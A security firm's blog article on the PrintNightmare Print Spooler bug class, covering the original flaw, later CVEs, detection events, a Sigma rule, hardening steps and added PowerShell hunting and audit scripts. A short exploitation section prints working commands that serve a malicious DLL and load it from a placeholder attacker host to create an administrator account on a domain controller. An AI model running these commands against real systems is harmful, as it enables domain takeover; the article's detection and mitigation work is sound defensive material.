PrintNightmare in 2026: The Bug Class Microsoft Couldn’t Quite Kill

Manish Garg, Associate of (ISC)² · RingSafe
Apr 25, 2026

Last updated: April 26, 2026

PrintNightmare (CVE-2021-1675 / CVE-2021-34527) was disclosed in mid-2021. Microsoft has issued multiple patches. PrintNightmare was supposed to die. It did not. The bug class — Windows Print Spooler vulnerabilities allowing remote code execution and local privilege escalation — has produced new CVEs in 2022, 2023, 2024, and 2025. This article covers what PrintNightmare actually was, the variants since, the detection that catches each, and why “just disable Print Spooler on DCs” is the sensible answer that almost everyone still has not implemented.

What the original bug was

Windows Print Spooler service (spoolsv.exe) lets users add printer drivers and print to remote printers. The function RpcAddPrinterDriverEx() allowed any authenticated user to install a printer driver — a DLL — that the spooler service (running as SYSTEM) then loaded.

From a low-privilege user, you could:

  1. Place a malicious DLL on a network share you control
  2. Call RpcAddPrinterDriverEx() against a target host (any Windows host with Print Spooler running)
  3. The spooler service loads your DLL as SYSTEM

The catastrophic case: this works against Domain Controllers, which (by default) run Print Spooler. Any domain user could load a DLL on every DC, becoming SYSTEM on every DC. Game over.

The patches and their bypasses

Microsoft’s response over 2021-2022 was a sequence of partial fixes, each followed by a community-published bypass within days or weeks. The eventual fix required:

  • Setting RestrictDriverInstallationToAdministrators=1 in registry
  • Disabling Point and Print client behaviour
  • For the safest case, disabling Print Spooler entirely

Many environments applied the early patches but not the later registry hardening. They are vulnerable to the bypasses.

The PrintNightmare family — variants since

SpoolFool (CVE-2022-21999)

Local privilege escalation. The SetPrinter() RPC call writes to specific registry paths; combined with directory-junction tricks, this lets a low-privilege user write to SYSTEM-protected locations. Disclosed February 2022.

Multiple 2023 variants

Quarterly Patch Tuesdays in 2023 fixed CVE-2023-21674, CVE-2023-21678, CVE-2023-28238, others — all Print Spooler issues, all enabling LPE or RCE.

2024 onwards

Print Spooler bugs continued through 2024 and 2025. As of 2026, Print Spooler remains an active research target. Multiple security researchers have stated they reliably find new bugs in it every quarter.

Why the bug class persists

Print Spooler is one of the oldest Windows services, written in C++ before modern memory safety practices, with extensive RPC surface, and integrated deeply into network protocols (SMB, DCOM, NTLM). Microsoft has rewritten parts of it multiple times. The architectural complexity makes complete remediation difficult.

Practical exploitation

From a domain-joined low-privilege account, the original PrintNightmare exploit (still works on partially-patched systems):

# Set up SMB share with malicious DLL
sudo impacket-smbserver evil /tmp/evil_share -smb2support

# From Windows attacker box, trigger:
.\Invoke-Nightmare.ps1 -DriverName "Generic Driver" -NewUser "evil" -NewPassword "EvilPass1!"
# Or with python:
python3 CVE-2021-1675.py corp.local/alice:'Pass'@dc.corp.local '\\attacker.com\evil\evil.dll'

Result: a new local administrator on the target host (DC if you targeted one).

Detection — what works

Print Spooler exploitation is reasonably loud if you know what to look for:

  • Event ID 808 in Microsoft-Windows-PrintService/Operational — driver installation events. Successful exploitation creates a clear log entry.
  • Event ID 7045 in System log — service installation, often follows Print Spooler exploitation when the attacker installs a service for persistence.
  • Sysmon Event 7 — DLL load by spoolsv.exe from non-standard paths (network shares, user temp directories) — high-fidelity.
  • Sysmon Event 11 — file creation in C:\Windows\System32\spool\drivers\ or related directories by non-admin users.

Sigma rule:

title: PrintNightmare Exploitation
logsource:
  product: windows
  category: image_load
detection:
  selection_spooler:
    Image|endswith: '\spoolsv.exe'
  selection_driverdir:
    ImageLoaded|contains:
      - '\drivers\x64\3\'
      - '\printers\drivers\'
  selection_unc:
    ImageLoaded|re: '^\\\\[^\\]+\\[^\\]+\\.*\.dll$'   # UNC path, e.g. \\host\share\x.dll
  # the driver-directory and UNC checks are alternatives, not both required
  condition: selection_spooler and (selection_driverdir or selection_unc)
level: high
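The same checks as a live hunt, written in PowerShell as an added example (not code from the article): it reads Sysmon Event 7 records for spoolsv.exe, flags DLLs loaded from UNC or user-writable paths, then lists the PrintService/Operational Event 808 entries from the same window. It assumes Sysmon ImageLoad logging is enabled and that the PrintService Operational log has been switched on (it is off by default).

```powershell
# Added hunting script, not part of the original article.
# Assumes: Sysmon with ImageLoad logging; Microsoft-Windows-PrintService/Operational enabled.
param(
    [int]$Hours = 24
)

$since = (Get-Date).AddHours(-$Hours)

# Locations a print driver DLL has no business being loaded from (regexes, case-insensitive).
$suspicious = @(
    '^\\\\',                          # UNC path: \\server\share\...
    '\\Users\\[^\\]+\\AppData\\',     # any user's AppData, incl. Local\Temp
    '\\Windows\\Temp\\',
    '\\ProgramData\\'
)

$loads = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-Sysmon/Operational'
    Id        = 7
    StartTime = $since
} -ErrorAction SilentlyContinue

foreach ($ev in $loads) {
    # Sysmon stores fields as <Data Name="...">; flatten them into a hashtable.
    $x = [xml]$ev.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    if ($d.Image -notmatch '\\spoolsv\.exe$') { continue }
    foreach ($re in $suspicious) {
        if ($d.ImageLoaded -match $re) {
            [pscustomobject]@{
                Time        = $ev.TimeCreated
                Host        = $ev.MachineName
                ImageLoaded = $d.ImageLoaded
                Signed      = $d.Signed
                Signature   = $d.Signature
            }
            break
        }
    }
}

# Event 808 entries from the PrintService log, for correlation with any hit above.
Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-PrintService/Operational'
    Id        = 808
    StartTime = $since
} -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, MachineName, @{n='User'; e={ $_.UserId }}, Message |
    Format-List
```

Run it on the host (or via Invoke-Command against a DC) with `-Hours 168` after deploying the Sigma rule to confirm the two agree on the same events.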

Mitigation

The actual fix, in priority order:

  1. Disable Print Spooler on Domain Controllers. DCs do not need to print. Disable the service entirely. Verify with Get-Service Spooler.
  2. Disable Print Spooler on critical servers (DBs, application servers, jump hosts) that do not need printing.
  3. For workstations and print servers that need it: install latest cumulative update, then set the registry hardening:
    HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint
    RestrictDriverInstallationToAdministrators = 1 (DWORD)
  4. Restrict who can use Point and Print. The default lets any authenticated user install drivers; restrict to administrators.
  5. Network segmentation. Print Spooler RPC should not be reachable from arbitrary network segments.

For a practical priority order across the fleet:

  • Domain Controllers first (highest impact).
  • Tier-0 admin workstations (Privileged Access Workstations).
  • Critical servers (file servers, database servers, application servers).
  • General workstation fleet last (lower exploit reach but largest count).

How to find your next Print Spooler-class bug

For attackers:

  • Always check Print Spooler service state on every Windows target. Disabled = move on; running + unpatched = exploitation candidate.
  • Track the latest spooler bug research — it does not stop. Subscribe to Will Dormann, Yaron Zinar, and known Windows-internals researchers’ feeds.
  • Test the latest disclosed bug against your in-scope hosts; environments rarely patch on Day 1.

For defenders:

  • Inventory Print Spooler service status across your Windows fleet. Hosts where it is enabled and not justified are remediation candidates.
  • Audit registry hardening (RestrictDriverInstallationToAdministrators) on hosts where spooler must remain enabled.
  • Add Sysmon Event 7 spool DLL detection to your SIEM. Validate it fires by running an Atomic Red Team simulation.
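A fleet audit that covers the mitigation priority list above and the defender checklist here (inventory Spooler state, audit RestrictDriverInstallationToAdministrators, DCs first), written in PowerShell as an added example and not the article's own code. It assumes WinRM is reachable with local administrator rights on the targets; the names in $Hosts are placeholders.

```powershell
# Added audit script, not part of the original article.
# Assumes WinRM access with local admin on each target; $Hosts values are placeholders.
param(
    [string[]]$Hosts = @('dc01.example.internal', 'ws01.example.internal')
)

$results = Invoke-Command -ComputerName $Hosts -ErrorAction Continue -ScriptBlock {
    $svc  = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    # Win32_ComputerSystem.DomainRole: 4 = backup DC, 5 = primary DC
    $role = (Get-CimInstance Win32_ComputerSystem).DomainRole
    $key  = 'HKLM:\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
    $rdia = (Get-ItemProperty -Path $key -Name RestrictDriverInstallationToAdministrators `
                -ErrorAction SilentlyContinue).RestrictDriverInstallationToAdministrators

    [pscustomobject]@{
        Host        = $env:COMPUTERNAME
        IsDC        = ($role -ge 4)
        Spooler     = if ($svc) { "$($svc.Status)/$($svc.StartType)" } else { 'absent' }
        # Missing value means the default (0): any authenticated user may install drivers.
        RestrictDrv = if ($null -eq $rdia) { 'unset (=0)' } else { $rdia }
    }
}

# Order as the article prioritises: DCs with a running spooler first, then any host
# where the spooler runs without the registry hardening, then everything else.
$results |
    Sort-Object @{e={ -not ($_.IsDC -and $_.Spooler -like 'Running*') }},
                @{e={ -not ($_.Spooler -like 'Running*' -and $_.RestrictDrv -ne 1) }} |
    Format-Table Host, IsDC, Spooler, RestrictDrv -AutoSize

# Remediation for a flagged DC or non-printing server (run on that host):
#   Stop-Service -Name Spooler; Set-Service -Name Spooler -StartupType Disabled
```

Feed $Hosts from your CMDB or Get-ADComputer rather than a static list, and keep the output as the evidence for the patching-SLA controls mentioned in the compliance section.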

Compliance angle

  • RBI Cyber Framework — vulnerability management with patching SLAs explicitly required for critical infrastructure.
  • SEBI CSCRF — Print Spooler exploitation maps to MITRE T1068 (Privilege Escalation) and T1210 (Exploitation of Remote Services).
  • DPDP §8(5) — known-vulnerable production systems are reasonable-security failures.

The takeaway

Print Spooler is the Windows service that should be disabled on every host that does not actively print. It is enabled by default, runs as SYSTEM, has a long history of remotely-exploitable RCE bugs, and continues to produce new CVEs regularly. The fix is operational discipline: inventory the service, disable where not needed, harden the rest. Domain Controllers running Print Spooler in 2026 is an organisational hygiene failure, not a technology problem. Audit your DCs today; if any have Print Spooler running, that is your highest-priority remediation.

Need a real pentest?


Senior practitioner-led VAPT — not a checklist run by juniors. CVSS-scored findings, free retest, attestation letter. India's SMBs and SaaS teams.
